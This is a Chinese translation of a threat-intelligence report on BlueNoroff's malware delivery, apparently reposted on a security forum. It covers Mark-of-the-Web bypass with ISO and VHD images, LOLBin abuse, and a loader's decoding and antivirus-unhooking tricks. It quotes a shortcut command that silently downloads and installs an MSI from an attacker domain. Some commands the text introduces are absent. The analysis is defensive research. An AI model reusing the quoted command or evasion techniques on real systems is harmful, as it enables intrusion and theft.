首页
社区
课程
招聘
[翻译]BlueNoroff引入了绕过MoTW的新方法
发表于: 2022-12-28 10:16 13249

[翻译]BlueNoroff引入了绕过MoTW的新方法

2022-12-28 10:16
13249

原文:https://securelist.com/bluenoroff-methods-bypass-motw/108383/

作者:SEONGSU PARK

翻译:梦幻的彼岸

BlueNoroff组织是一个有经济动机的威胁行动者,渴望通过其网络攻击能力获利。我们之前已经公布了这个臭名昭著的组织如何窃取加密货币的技术细节。我们继续跟踪该集团的活动,今年10月,我们观察到其武器库中采用了新的恶意软件株。该集团通常利用Word文档的优势,并使用快捷键文件进行初始入侵。然而,它最近开始采用新的恶意软件交付方法。

该组织采用的第一个新方法旨在规避网络标记(MOTW)标志,即当用户试图打开从互联网下载的文件时,Windows会显示警告信息的安全措施。为了做到这一点,使用了光盘镜像(扩展名为.iso)和虚拟硬盘(扩展名为.vhd)文件格式。这是当今逃避MOTW的一种常见策略,BlueNoroff也采用了这种策略。

此外,该组织还测试了不同的文件类型,以完善恶意软件的交付方式。我们观察到一个新的Visual Basic脚本,一个以前没有见过的Windows批处理文件,以及一个Windows可执行文件。看来BlueNoroff背后的威胁行动者正在扩大或试验新的文件类型,以有效地传达他们的恶意软件。

在研究了所利用的基础设施后,我们发现这个组织使用了70多个域名,这意味着他们直到最近还非常活跃。此外,他们还创建了许多看起来像风险资本和银行域名的假域名。大多数域名模仿日本的风险投资公司,表明该集团对日本的金融实体有广泛的兴趣。

在2022年9月底,我们在遥测中观察到新的BlueNoroff恶意软件。经过仔细调查,我们确认威胁行动者采用了新的技术来传达最终的有效载荷。该威胁行动者利用了几个脚本,包括Visual Basic脚本和Windows Batch脚本。他们还开始使用磁盘镜像文件格式,.iso和.vhd,来传递他们的恶意软件。对于中间感染,该威胁行动者引入了一个下载器来获取和生成下一阶段的有效载荷。虽然在这次活动中,最初的入侵方法非常不同,但我们以前分析过的最终有效载荷被使用,没有重大变化。

根据我们的遥测数据,我们观察到UAE的一名受害者是使用一个恶意的Word文档被攻击的。该受害者在2022年9月2日收到一个名为 "Shamjit Client Details Form.doc "的文档文件。不幸的是,我们无法获得该文件,但它是从以下路径执行的。
C:\Users\[username]\Desktop\SALES OPS [redacted]\[redacted]\Signed Forms & Income Docs\Shamjit Client Details Form.doc

从文件路径来看,我们可以认为受害者是销售部门负责签署合同的员工。

启动后,恶意文件连接到远程服务器并下载有效载荷。在这个特定案例中,可执行文件ieinstal.exe被用来绕过UAC。

初次感染后,我们观察到操作者的几个键盘动手活动。通过植入的后门,他们试图对受害者进行指纹识别,并以高权限安装其他恶意软件。感染后,操作者执行了几个Windows命令以收集基本的系统信息。然后,他们在18小时后返回,进一步安装具有高权限的恶意软件。

根据我们的遥测数据,当恶意的Word文档打开时,它会从远程服务器获取下一个有效载荷:

获取的有效载荷应该被保存在%Profile%\update.dll中。最后,使用以下命令生成提取的文件:

BlueNoroff组织通常使用的其他方法之一是带有快捷方式文件的ZIP档案。我们最近发现的存档文件包含一个受密码保护的诱饵文件和一个名为 "Password.txt.lnk "的快捷方式文件。这是一个典型的BlueNoroff策略,说服受害者执行恶意的快捷方式文件以获得诱饵文件的密码。最新发现的存档文件(MD5 1e3df8ee796fc8a13731c6de1aed0818)有一个日文文件名,即新しいボーナスケジュール.zip(日文为 "新奖金计划表"),表明他们对日本目标感兴趣。

与之前的快捷方式样本的主要区别是,它获取了一个额外的脚本有效载荷(Visual Basic脚本或HTML应用程序);同时,这次还采用了不同的方法来获取和执行下一阶段的有效载荷。当受害者双击该快捷方式文件时,下面的命令被执行:

1

2

3

4

cmd.exe /c DeviceCredentialDeployment & echo jbusguid> %APPDATA%\Pass.txt & start

%APPDATA%\Pass.txt && FOR %i IN (%systemroot%\system32\msiexec.*) DO msiexec -c /Q /i

 

hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd & timeout

为了躲避检测,该威胁行动者利用了Living Off the Land Binaries(LOLBins)。DeviceCredentialDeployment的执行是一个著名的LOLBin,用于隐藏命令的窗口。该威胁行动者还滥用了msiexe.exe文件来悄悄地启动获取的Windows安装程序文件。

我们观察到,该威胁行动者检查了不同的文件类型来传递他们的恶意软件。最近,许多威胁者采用图像文件来避免MOTW(网络标记)。简而言之,MOTW是由微软推出的一种缓解技术。NTFS文件系统对从互联网上下载的文件进行标记,而Windows则以安全的方式处理该文件。例如,当从互联网上获取一个微软Office文件时,操作系统会在保护视图中打开它,这限制了嵌入式宏的执行。为了避免这种缓解技术,更多的威胁者已经开始滥用ISO文件类型。BlueNoroff集团很可能尝试用ISO图像文件来传递他们的恶意软件。虽然它仍在开发中,但我们提到这个样本作为一个早期警告。这个ISO镜像文件包含一个PowerPoint幻灯片和一个Visual Basic脚本。


Microsoft PowerPoint文件包含一个链接。当用户点击该链接时,它通过WScript程序执行1.vbs文件。当我们检查VBS文件时,它只产生了一个 "ok "信息,这表明BlueNoroff仍在试验这种方法。

1

2

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="wscript%201.vbs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>

根据我们的其他发现,我们从VirusTotal发现了一个野生样本(MD5 a17e9fc78706431ffc8b3085380fe29f)在分析的时候,这个.vhd样本没有被任何反病毒软件检测到。该虚拟磁盘文件包含一个诱饵PDF文件、Windows可执行文件和一个加密的Dump.bin文件。PDF和可执行文件在文件扩展名前有许多空格,以隐藏它并减轻怀疑。


Job_Description[空格].exe文件 (MD5 931d0969654af3f77fc1dab9e2bd66b1)是一个加载器,用于加载下一阶段的有效载荷。启动后,它将Dump.bin文件复制到%Templates%\war[当前时间][随机值].bin(即war166812964324445.bin)。Dump.bin有一个修改的PE头。恶意软件读取Dump.bin的第一个字节,即该文件中的0xAF,并使用该密钥解码0x3E8字节。解密后的数据是PE文件的头,将恢复后的头覆盖到原始文件。最终,它通过催生普通的第一个导出函数来加载解密的DLL文件。

催生的下载器在文件的末尾包含一个加密的配置。恶意软件首先从文件的末尾获取配置数据的总大小和有效载荷URL的长度。它们分别位于文件末尾的四个字节和八个字节。恶意软件用RC4算法解密配置数据,使用一个嵌入的64字节的密钥。

然而,在另一个下载器的情况下,有效载荷的URL是用一个命令行参数传递的。此外,其他一些下载器 (MD5 f766f97eb213d81bf15c02d4681c50a4) 有检查工作环境的功能。如果物理内存的大小小于2,147,483,648字节,恶意软件将终止执行。


该下载器可检查以下防病毒厂商的名称:Sophos, Kaspersky, Avast, Avira, Bitdefender, TrendMicro, and Windows Defender。如果安装了TrendMicro、BitDefender或Windows Defender产品,该恶意软件会进行一个经典的unhooking DLL技巧,旨在从系统库中删除用户模式钩子。这种规避技术用新加载的ntdll库覆盖了预加载的.text部分,这样被钩住的API地址就会被恢复为原始API地址。通过这个技巧,恶意软件可以禁用EDR/AV产品的功能。接下来,该恶意软件创建了一个突变器,以避免重复执行。

接下来,该恶意软件在同一目录下打开一个PDF诱饵文件。该诱饵文件伪装成一家日本跨国银行的工作机会。

如果受害者的电脑上安装了Windows Defender或Bitdefender Antivirus,该恶意软件就会通过以下命令执行自己的程序:

这个恶意软件的主要目标是获取下一阶段的有效载荷。为了做到这一点,该恶意软件使用cURL库,根据所安装的防病毒软件组合cURL命令。

请注意,用户代理名称是 "cur1-agent",如果受害者安装了Avira或Avast,恶意软件会发送 "da "POST数据;否则,恶意软件会发送 "dl "POST数据。如果cURL命令获取的数据包含"<html>"和 "curl:",恶意软件就会用交付的64字节RC4密钥解密有效载荷。

如果安装了Avira或Avast,恶意软件会将解密后的有效载荷保存到"%TEMPLATES%\marcoor.dll "中,并通过带有有效载荷URL的rundll32.exe命令生成。

否则,恶意软件不会将有效载荷写入文件,而是将获取的有效载荷注入explorer.exe进程。获取的有效载荷是一个DLL类型的可执行文件,其导出功能是通过 "有效载荷URL "生成的。

不幸的是,到目前为止,我们还没有能够获得一个精确的感染链。然而,从我们的遥测数据中,我们可以确认受害者最终被后门型恶意软件所感染。根据恶意软件的静态信息,以及部分内部代码,我们评估,最终的有效载荷仍然非常类似于我们在以前的博客中描述的持久性后门#2 。

此外,我们还观察到下载和启动了一个可疑的批处理文件。威胁行动者利用了不同的LOLBins。使用系统文件夹中的合法脚本SyncAppvPublishingServer.vbs执行恶意软件。此脚本用于通过Windows计划任务执行PowerShell脚本。

1


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 6
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//